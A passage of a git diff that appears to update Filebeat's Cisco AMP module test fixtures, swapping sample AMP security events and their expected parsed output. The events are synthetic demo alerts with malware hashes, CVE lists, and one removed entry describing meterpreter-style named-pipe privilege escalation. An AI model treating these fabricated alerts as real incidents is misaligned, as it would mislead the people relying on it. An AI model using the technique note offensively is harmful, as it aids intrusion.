Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet 
Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft 
Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan 
Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} \ No newline at end of file 
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json
index 7cd87985c4a6..c26ba6d92862 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json
@@ -420,119 +420,63 @@ ] }, { - "@timestamp": "2021-01-15T10:32:58.000Z", - "cisco.amp.cloud_ioc.description": "A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.", - "cisco.amp.cloud_ioc.short_description": "W32.PossibleNamedPipeImpersonation.ioc", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "27:85:29:21:67:49" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.event_type_id": 1107296274, - "cisco.amp.file.disposition": "Clean", - "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006657", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "27:85:29:21:67:49" - ], - "cisco.amp.timestamp_nanoseconds": 322000000, - "event.action": "Cloud IOC", - "event.category": [ - "file" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 978000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 1476910664322001000, + "event.id": 6180341055704007000, "event.kind": "alert", 
"event.module": "cisco", "event.severity": 3, - "event.start": "2021-01-15T10:32:58.000Z", - "file.hash.sha256": "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2", - "file.name": "cmd.exe", - "file.path": "/C:/WINDOWS/system32/cmd.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Command_Line_Arguments_Meterpreter", - "host.name": "Demo_Command_Line_Arguments_Meterpreter", - "input.type": "log", - "log.offset": 25799, - "process.hash.sha256": "69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9", - "related.hash": [ - "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2" - ], - "related.hosts": [ - "Demo_Command_Line_Arguments_Meterpreter" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:27:39.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533671385032556606", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 25000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533671385032557000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - 
"file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 27431, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 18534, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], 
@@ -540,64 +484,71 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55805, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:27:38.000Z", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533671380737589308", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006661", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 605000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 947000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 6533671380737589000, + "event.id": 6180341055704007000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": 
"b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", + "event.severity": 3, "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 30074, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 19987, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], 
@@ -605,66 +556,71 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55809, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:26:38.000Z", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533671123039551547", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006660", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 81000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 931000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 6533671123039551000, + "event.id": 6180341055704007000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": 
"b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "event.severity": 3, "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 31393, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 21440, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], 
@@ -672,3680 +628,71 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55808, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:26:37.000Z", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533671118744584249", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006659", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 666000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533671118744584000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 34036, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - 
"b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:25:37.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533670861046546488", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 293000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533670861046546000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 35355, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - 
"Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:25:36.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533670856751579190", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 880000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533670856751579000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 38000, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - 
"forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:24:58.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", - "cisco.amp.event_type_id": 1107296258, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 329000000, - "event.action": "Multiple Infected Files", - "event.category": [ - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 1489955900329000200, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 3, - "event.start": "2021-01-15T10:24:58.000Z", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "input.type": "log", - "log.offset": 39319, - "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:23:01.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - 
